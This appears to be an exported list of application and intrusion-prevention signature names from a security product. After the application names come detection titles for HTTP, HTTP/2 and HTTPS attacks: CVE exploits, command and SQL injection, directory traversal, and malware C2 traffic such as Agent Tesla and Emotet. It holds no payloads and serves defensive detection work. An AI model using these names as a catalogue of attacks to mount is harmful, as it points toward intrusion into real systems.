Hopster
Horsesmouth
Host-Analytics
Host-Europe
Host-Point
HostDime
Hosted Business Applications
Hosted-Dynamics-GP
Hosted-Graphite
HostGator
HostMonster
Hotels.com
Hotfile
HotGloo
Hotjar
Hotmail
Hotpop
HotSchedules
Hotspot-Shield-VPN
Hotwire
HoudiniESQ
HouseCall-Pro
Hover
Howardforums
Howlr
HP CEEment
HP Support Assistant
HP Touchpoint Analytics Client
HP-Eprint-Center
HP-Fortify-On-Demand
HP-Helion-Cloud
HR-Connection
HR-Mantra
HR-Meter
HR-Passport
HR-Performance-Management
HRBoss
HRmarketer
HRMC-Acclaim
HRMS
HRTMS
HSBC
HSEQ-Innovate
HSL-Reittiopas
HTTP
HTTP-0.9
HTTP-Injector
HTTP-Proxy-Service
HTTP-Soap
Http.tunnel
HTTP2_Client-Decompression-Error-Incomplete-Data
HTTP2_Client-Decompression-Error-No-Data
HTTP2_Client-Decompression-Trailing-Data
HTTP2_Client-Goaway-Error
HTTP2_Client-Goaway-Graceful-Shutdown
HTTP2_Client-Multipart-Syntax-Error
HTTP2_DATA-In-Invalid-State
HTTP2_DATA-Without-Request
HTTP2_Duplicate-END_HEADERS
HTTP2_Duplicate-END_STREAM
HTTP2_Duplicate-Header
HTTP2_Frame-Type-PING
HTTP2_Frame-Type-PRIORITY
HTTP2_Frame-Type-RST_STREAM
HTTP2_Frame-Type-SETTINGS
HTTP2_Frame-Type-WINDOW_UPDATE
HTTP2_FRAME_HEADER-Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service
HTTP2_HEADERS-In-Invalid-State
HTTP2_HPACK-Haproxy-HTTP2-HPACK-Out-of-Bound-Write
HTTP2_Invalid-Character-In-header
HTTP2_Invalid-Client-Preface
HTTP2_Invalid-Compression
HTTP2_Invalid-Content-Length
HTTP2_Invalid-Content-Range
HTTP2_Invalid-Dep-Stream-Ref
HTTP2_Invalid-Dyn-Table-Size
HTTP2_Invalid-Flags
HTTP2_Invalid-Frame-Type
HTTP2_Invalid-GOAWAY-Stream-Ref
HTTP2_Invalid-Header-Index
HTTP2_Invalid-Max-Frame-Size
HTTP2_Invalid-Server-Preface
HTTP2_Invalid-Status
HTTP2_Invalid-Stream-ID-Parity
HTTP2_Max-Frame-Size-Exceeded
HTTP2_Missing-Path
HTTP2_Missing-Scheme
HTTP2_Missing-Status-Code
HTTP2_Promised-Stream-Exists
HTTP2_Protocol-Error
HTTP2_Protocol-Identified
HTTP2_Server-Decompression-Error-Incomplete-Data
HTTP2_Server-Decompression-Error-No-Data
HTTP2_Server-Decompression-Trailing-Data
HTTP2_Server-Goaway-Error
HTTP2_Server-Goaway-Graceful-Shutdown
HTTP2_Server-Multipart-Syntax-Error
HTTP2_SETTINGS-Ack-Not_empty
HTTP2_SETTINGS-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
HTTP2_SETTINGS-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
HTTP2_Too-Long-Padding
HTTP2_Too-Short-Payload
HTTP2_Unexpected-Content-Length
HTTP2_Unexpected-SETTINGS-Ack
HTTP2_Unknown-Setting-ID
HTTP8080_Apache-SSL-Proxy-Vulnerability
HTTP8080_CS-Squid-Authentication-Header-DoS
HTTP8080_CS-Squid-HTTP-Version-Number-Parsing-Denial-Of-Service
HTTP8080_CS-Squid-Proxy-FTP-URI-Processing-Denial-Of-Service
HTTP8080_CS-TRACE-Request-With-Zero-Value-In-Max-Forwards-Header-Field
HTTP8080_Squid-Oversized-Reply-Header-Handling
HTTP8080_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection
HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection-2
HTTPS_CS-Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service
HTTPS_CS-Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF-BSD
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-Buffer-Overflow
HTTPS_CS-Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion
HTTPS_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
HTTPS_CS-Gheg-Spambot
HTTPS_CS-GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error
HTTPS_CS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
HTTPS_CS-GnuTLS-Status_request-Extension-Null-Pointer-Dereference
HTTPS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
HTTPS_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
HTTPS_CS-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
HTTPS_CS-IIS-Ssl-Library-Malformed-Client-Hello-DoS
HTTPS_CS-IIS-Ssl-PCT-Buffer-Overflow
HTTPS_CS-Large-Number-Of-Renegotiations-In-One-TLS-Connection
HTTPS_CS-Microsoft-Active-Directory-Federation-Services-Code-Execution
HTTPS_CS-Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service
HTTPS_CS-Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748
HTTPS_CS-Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion
HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow
HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow-2
HTTPS_CS-Netscape-Network-Security-Services-Library-SSLv2-Buffer-Overflow
HTTPS_CS-Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow
HTTPS_CS-Node.js-Foundation-Node.js-TLS-Denial-Of-Service
HTTPS_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
HTTPS_CS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
HTTPS_CS-OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution
HTTPS_CS-OpenSSL-BN_Mod_sqrt-Infinite-Loop
HTTPS_CS-OpenSSL-ChangeCipher-Before-Key-Exchange
HTTPS_CS-OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service
HTTPS_CS-OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service
HTTPS_CS-OpenSSL-ECDH-Use-After-Free
HTTPS_CS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
HTTPS_CS-OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow
HTTPS_CS-OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service
HTTPS_CS-OpenSSL-Invalid-SRP-Parameter-A-Buffer-Overflow
HTTPS_CS-OpenSSL-SSL3_al_warning-Denial-Of-Service
HTTPS_CS-OpenSSL-SSLv2-Get-Shared-Ciphers-Function-Buffer-Overflow
HTTPS_CS-OpenSSL-SSLv3-Get-Shared-Ciphers-Function-Buffer-Overflow
HTTPS_CS-OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference
HTTPS_CS-OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free
HTTPS_CS-OpenSSL-X509_cmp_Time-Denial-Of-Service
HTTPS_CS-Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow
HTTPS_CS-Oracle-Secure-Backup-Administration-Server-Command-Injection
HTTPS_CS-Oracle-Secure-Backup-Remote-Cookies-Command-Injection
HTTPS_CS-Plaintext-Request-In-HTTPS-Context
HTTPS_CS-Red-Hat-librelp-Stack-Buffer-Overflow
HTTPS_CS-Schannel-CVE-2010-3229
HTTPS_CS-Shared-Variables-For-Client-Stream-Context
HTTPS_CS-Short-Session-Id
HTTPS_CS-Solarwinds-SunBurst-Beacon
HTTPS_CS-Squid-SSL-Bump-Denial-Of-Service
HTTPS_CS-SSL-3.0-Client-Hello
HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage
HTTPS_CS-Suspected-HIDDEN-COBRA-Malicious-SSL-Traffic
HTTPS_CS-Suspicious-Client-Request
HTTPS_CS-Suspicious-Handshake-Request
HTTPS_CS-TLS-Heartbeat-Request
HTTPS_CS-Too-Long-Session-Id
HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
HTTPS_SS-Anonymous-Key-Exchange
HTTPS_SS-Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service
HTTPS_SS-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
HTTPS_SS-Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution
HTTPS_SS-Breakingpoint-Generated-TLS-Server-Hello-Message
HTTPS_SS-Cisco-Security-Agent-Management-Center-Code-Execution
HTTPS_SS-Cleartext-HTTP-After-TLS-Handshake
HTTPS_SS-GnuTLS-Certificate-Verification-Policy-Bypass
HTTPS_SS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
HTTPS_SS-GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow
HTTPS_SS-Insecure-Rc4-Cipher-Suite-Usage
HTTPS_SS-Joost-Usage
HTTPS_SS-Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation
HTTPS_SS-Lets-Encrypt-Signed-Certificate
HTTPS_SS-Microsoft-Schannel-Security-Package-Compromise
HTTPS_SS-Mozilla-Network-Security-Services-RSA-Signature-Forgery
HTTPS_SS-Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow
HTTPS_SS-Mozilla-NSS-Tls-Regexp-Buffer-Overflow
HTTPS_SS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service
HTTPS_SS-Null-Cipher-Usage
HTTPS_SS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
HTTPS_SS-OpenSSL-Anonymous-ECDH-Denial-Of-Service
HTTPS_SS-OpenSSL-ASN1_Type_cmp-Denial-Of-Service
HTTPS_SS-OpenSSL-BN_Mod_sqrt-Infinite-Loop
HTTPS_SS-OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow
HTTPS_SS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
HTTPS_SS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
HTTPS_SS-OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow
HTTPS_SS-OpenSSL-Large-Dh-Parameter-Denial-Of-Service
HTTPS_SS-OpenSSL-Null-Pointer-Dereference-CVE-2020-1971
HTTPS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
HTTPS_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service
HTTPS_SS-OpenSSL-X509_cmp_Time-Denial-Of-Service
HTTPS_SS-Python-Ssl-X.509-Distributionpoint-Extension-Null-Pointer-Dereference
HTTPS_SS-Shared-Variables-For-Server-Stream-Context
HTTPS_SS-Short-Diffie-Hellman-Prime
HTTPS_SS-Short-Session-Id
HTTPS_SS-Squid-SSL-Bump-Denial-Of-Service
HTTPS_SS-Superfish-TLS-Certificate
HTTPS_SS-Suspicious-Server-Certificate
HTTPS_SS-Suspicious-Server-Response
HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error
HTTPS_SS-TLS-Certificate-Suspicious-UTCTime-Validity-End-Time
HTTPS_SS-TLS-Heartbeat-Response
HTTPS_SS-TLS-Potential-Heartbeat-Response
HTTPS_SS-Too-Long-Session-Id
HTTPS_SS-Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution
HTTPS_SS-Very-Short-Diffie-Hellman-Prime
HTTP_204-Response-With-Body
HTTP_304-Response-With-Body
HTTP_3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
HTTP_7-Zip-ARJ-Archive-Long-Local-File-Header-Buffer-Overflow
HTTP_ACDSee-XPM-File-Handling-Buffer-Overflow
HTTP_Adobe-Acrobat-File-Information-Disclosure
HTTP_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
HTTP_Adobe-Download-Manager-Buffer-Overflow
HTTP_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
HTTP_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
HTTP_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
HTTP_ADODB.Stream-ActiveX-Object-Local-Disk-Write
HTTP_Akamai-Download-Manager-BOF
HTTP_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
HTTP_Ani-Windows-Animationheader-Length-Buffer-Overflow
HTTP_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
HTTP_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption
HTTP_Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability
HTTP_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
HTTP_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
HTTP_Apple-QuickTime-BMP-Handling-Buffer-Overflow
HTTP_Apple-QuickTime-Color-Table-Id-Heap-Corruption
HTTP_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
HTTP_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
HTTP_Apple-QuickTime-FPX-File-Handling-Integer-Overflow
HTTP_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
HTTP_Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting
HTTP_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
HTTP_Apple-QuickTime-Movie-With-Embedded-Script
HTTP_Apple-QuickTime-Plug-In-Security-Bypass
HTTP_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
HTTP_Apple-Safari-Regular-Expression-Heap-Buffer-Overflow
HTTP_Asp-Scripting-In-Server-Reply
HTTP_AVI-DirectX-DirectShow-AVI-Strn-BOF
HTTP_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
HTTP_Bad-Content-Length
HTTP_BD-Wow32-Banner
HTTP_Body-No-Length
HTTP_Body-Not-Allowed-Request
HTTP_Body-Not-Allowed-Response
HTTP_Business-Objects-Crystal-Reports-Rpt-File-Handling
HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities
HTTP_CCH-Apache-Chunked-Encoding-BO-3
HTTP_CCH-Apache-Chunked-Encoding-BO-5
HTTP_CCH-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
HTTP_CCH-Chunk-Extension
HTTP_CCH-Large-Chunk-Size
HTTP_CCH-Maliciously-Large-Chunk-Size
HTTP_CCH-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF
HTTP_CCH-Zero-Chunk-Size
HTTP_CHS-Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass
HTTP_CHS-Citrix-Authorization-Bypass-CVE-2020-8193
HTTP_CHS-Emotet-Host-In-HTTP
HTTP_CHS-Intel-AMT-CVE-2017-5689
HTTP_CHS-Suspicious-Host
HTTP_Chunk-Size
HTTP_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
HTTP_Client-Boundary-String-Too-Long
HTTP_Client-Content-Disposition-Without-Mandatory-Part
HTTP_Client-Content-Type-Without-Mandatory-Part
HTTP_Client-Decompression-Error-Incomplete-Data
HTTP_Client-Decompression-Error-No-Data
HTTP_Client-Decompression-Trailing-Data
HTTP_Client-Header-Name-Too-Long
HTTP_Client-Header-Name-Unparseable
HTTP_Client-Header-Value-Unparseable
HTTP_Client-Headers
HTTP_Client-Hostile-Use-of-Header-Line-Folding
HTTP_Client-MIME-Parameter-Syntax-Incorrect
HTTP_Client-Multipart-Delimiter-Use-Invalid
HTTP_Client-Multipart-No-Valid-Boundary-String
HTTP_Client-Multipart-Syntax-Error
HTTP_Client-Nested-Multipart-Message
HTTP_Client-Obsolete-Header-Line-Folding
HTTP_Client-Syntax-Error
HTTP_CLR-Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure
HTTP_Connect-Fails-With-Pipelined-Data
HTTP_Connect-In-HTTP
HTTP_Constraint
HTTP_Content-Disposition
HTTP_Content-Encoding-Unsupported
HTTP_Content-Range
HTTP_Content-Type
HTTP_Content-Type-Boundary
HTTP_Content-Type-Message-RFC822
HTTP_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
HTTP_CRH-Ahsay-Backup-Insecure-File-Upload
HTTP_CRH-Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption
HTTP_CRH-AutoIt-Compiled-Program-Traffic
HTTP_CRH-Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass
HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781
HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781-2
HTTP_CRH-Exorcist-C2-Traffic
HTTP_CRH-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166
HTTP_CRH-Kinsing-Linux-Trojan-Infection-Traffic
HTTP_CRH-Microsoft-Exchange-SSRF-CVE-2021-34473
HTTP_CRH-Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution
HTTP_CRH-Ruby-On-Rails-File-Content-Disclosure
HTTP_CRH-Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability
HTTP_CRH-Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow
HTTP_CRH-Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal
HTTP_CRH-VLC-Httpd-Connection-Header-Format-String-RCE
HTTP_CRH-Web-Content-Scanner-Activity
HTTP_CRH-WSHRAT-Malware-Infection-Traffic
HTTP_CRL-3CX-Phone-System-CRM-Integration-SQL-Injection-CVE-2023-49954
HTTP_CRL-ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609
HTTP_CRL-Accellion-FTA-oauth_token-Remote-Command-Execution
HTTP_CRL-ACGVclick-Remote-Code-Injection-Compromise
HTTP_CRL-Acronis-Cyber-Protect-Backup-Remote-Code-Execution
HTTP_CRL-Active-Collab-Remote-PHP-Code-Injection
HTTP_CRL-Admentor-Admin-Asp-Vulnerability
HTTP_CRL-Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008
HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal
HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal
HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal
HTTP_CRL-Adobe-ColdFusion-Authentication-Misconfiguration
HTTP_CRL-Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization
HTTP_CRL-Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360
HTTP_CRL-Adobe-ColdFusion-Directory-Traversal
HTTP_CRL-Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution
HTTP_CRL-Adobe-ColdFusion-Insecure-Deserialization
HTTP_CRL-Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass
HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting
HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection
HTTP_CRL-Adobe-Magento-Downloadcss-Cross-Site-Scripting
HTTP_CRL-Adobe-Magento-Remote-Code-Execution-CVE-2022-24086
HTTP_CRL-Adobe-RoboHelp-Server-SQL-Injection
HTTP_CRL-Advantech-Iview-Commandservlet-Directory-Traversal
HTTP_CRL-Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection
HTTP_CRL-Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal
HTTP_CRL-Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal
HTTP_CRL-Advantech-Iview-exportInventoryTable-Sort-SQL-Injection
HTTP_CRL-Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection
HTTP_CRL-Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection
HTTP_CRL-Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection
HTTP_CRL-Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2
HTTP_CRL-Advantech-Iview-Getpsinventoryinfo-SQL-Injection
HTTP_CRL-Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection
HTTP_CRL-Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal
HTTP_CRL-Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection
HTTP_CRL-Advantech-Iview-Setdeviceauthentication-SQL-Injection
HTTP_CRL-Advantech-Iview-Set_Useraccount-Username-SQL-Injection
HTTP_CRL-Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection
HTTP_CRL-Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection
HTTP_CRL-Advantech-Iview-UserServlet-SQL-Injection
HTTP_CRL-Advantech-Iview-Ztpconfigtable-SQL-Injection
HTTP_CRL-Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting
HTTP_CRL-Advantech-r-Seenet-Device_List-SQL-Injection
HTTP_CRL-Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection
HTTP_CRL-Advantech-R-Seenet-Device_status.php-Local-File-Inclusion
HTTP_CRL-Advantech-r-Seenet-Out.PHP-Directory-Traversal
HTTP_CRL-Advantech-r-Seenet-Ping.PHP-Command-Injection
HTTP_CRL-Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting
HTTP_CRL-Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting
HTTP_CRL-Advantech-WebAccess-Blind-SQL-Injection
HTTP_CRL-Advantech-WebAccess-Dashboard-Multiple-Directory-Traversal-Vulnerabilities
HTTP_CRL-Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal
HTTP_CRL-Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting
HTTP_CRL-Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal
HTTP_CRL-Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal
HTTP_CRL-Advantech-WebAccess-Node-Chklogin2-SQL-Injection
HTTP_CRL-Advantech-WebAccess-Rmtemplate-SQL-Injection
HTTP_CRL-Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting
HTTP_CRL-Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite
HTTP_CRL-Advantech-WebAccess-Soap-Request-SQL-Injection
HTTP_CRL-Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection
HTTP_CRL-Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection
HTTP_CRL-Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection
HTTP_CRL-Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection
HTTP_CRL-Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection
HTTP_CRL-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
HTTP_CRL-Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection
HTTP_CRL-Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181
HTTP_CRL-Adware-Toolbarcc
HTTP_CRL-Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE
HTTP_CRL-Agent-Tesla-C2-Traffic
HTTP_CRL-Aglimpse-Cgi-System-Compromise
HTTP_CRL-AJ-Report-Potential-Authentication-Bypass-CVE-2024-7314
HTTP_CRL-AJ-Report-Remote-Code-Execution-CVE-2024-7314
HTTP_CRL-AjaxPro-Deserialization-Remote-Code-Execution
HTTP_CRL-Ajenti-Auth-Username-Command-Injection
HTTP_CRL-Alibaba-Command-Execution
HTTP_CRL-Alibaba-Command-Execution-2
HTTP_CRL-Alienvault-Ossim-Arbitrary-Command-Injection
HTTP_CRL-Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection
HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection
HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection-2
HTTP_CRL-Allegra-Ganttandschexportaction-Directory-Traversal
HTTP_CRL-Allegra-Getfilecontentasstring-Directory-Traversal
HTTP_CRL-Alt-N-MDaeamon-Buffer-Overflow-Vulnerability
HTTP_CRL-Alt-N-Technologies-SecurityGateway-Usename-BOF
HTTP_CRL-Alt-N-WebAdmin-User-Parameter-BOF
HTTP_CRL-Amadey-Bot-Infection-Traffic
HTTP_CRL-Android-Gingermaster-Traffic
HTTP_CRL-AntiBoard-SQL-Injection-CVE-2004-2062
HTTP_CRL-Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678
HTTP_CRL-Apache-Activemq-Fileserver-File-Upload-Directory-Traversal
HTTP_CRL-Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting
HTTP_CRL-Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting
HTTP_CRL-Apache-Airflow-Dag-OS-Command-Injection
HTTP_CRL-Apache-Airflow-Dag-Run_Id-Command-Injection
HTTP_CRL-Apache-Airflow-Origin-Cross-Site-Scripting
HTTP_CRL-Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass
HTTP_CRL-Apache-Axis2-Default-Credentials
HTTP_CRL-Apache-Camel-Filter-Bypass-CVE-2025-29891
HTTP_CRL-Apache-Cloudstack-Saml-Authentication-Bypass
HTTP_CRL-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
HTTP_CRL-Apache-Continuum-Command-Injection
HTTP_CRL-Apache-Couchdb-Config-Command-Execution-CVE-2018-8007
HTTP_CRL-Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting
HTTP_CRL-Apache-Druid-Javascriptdimfilter-Remote-Code-Execution
HTTP_CRL-Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution
HTTP_CRL-Apache-Druid-JNDI-Injection-RCE
HTTP_CRL-Apache-Flink-CVE-2020-17519
HTTP_CRL-Apache-Flink-JAR-Upload-Java-Code-Execution
HTTP_CRL-Apache-Httpd-Mod_Cgi-Handler-Confusion
HTTP_CRL-Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery
HTTP_CRL-Apache-Hugegraph-CVE-2024-27348-Suspicious-String-In-Gremlin-Query
HTTP_CRL-Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348
HTTP_CRL-Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting
HTTP_CRL-Apache-Jetspeed-SQL-Injection
HTTP_CRL-Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting
HTTP_CRL-Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting
HTTP_CRL-Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting
HTTP_CRL-Apache-Kylin-Rest-API-Migratecube-Command-Injection
HTTP_CRL-Apache-Kylin-Runsparksubmit-Command-Injection
HTTP_CRL-Apache-NiFi-H2-Connection-String-Remote-Code-Execution
HTTP_CRL-Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting
HTTP_CRL-Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467
HTTP_CRL-Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection
HTTP_CRL-Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization
HTTP_CRL-Apache-Ofbiz-CVE-2024-36104-Directory-Traversal
HTTP_CRL-Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization
HTTP_CRL-Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507
HTTP_CRL-Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting
HTTP_CRL-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
HTTP_CRL-Apache-OpenMeetings-Event-Description-Cross-Site-Scripting
HTTP_CRL-Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service
HTTP_CRL-Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload
HTTP_CRL-Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization
HTTP_CRL-Apache-SkyWalking-Graphql-Protocol-SQL-Injection
HTTP_CRL-Apache-Solr-Data-Import-Handler-XML-External-Entity-Expansion-Information-Disclosure
HTTP_CRL-Apache-Solr-Dataimporthandler-Remote-Code-Execution
HTTP_CRL-Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution
HTTP_CRL-Apache-Spark-Getunixgroups-Command-Injection
HTTP_CRL-Apache-Struts-2-Command-Execution
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution
HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass
HTTP_CRL-Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution
HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution
HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
HTTP_CRL-Apache-Struts-Remote-Java-Execution
HTTP_CRL-Apache-Struts-Remote-Java-Execution-2
HTTP_CRL-Apache-Struts-Remote-Java-Execution-3
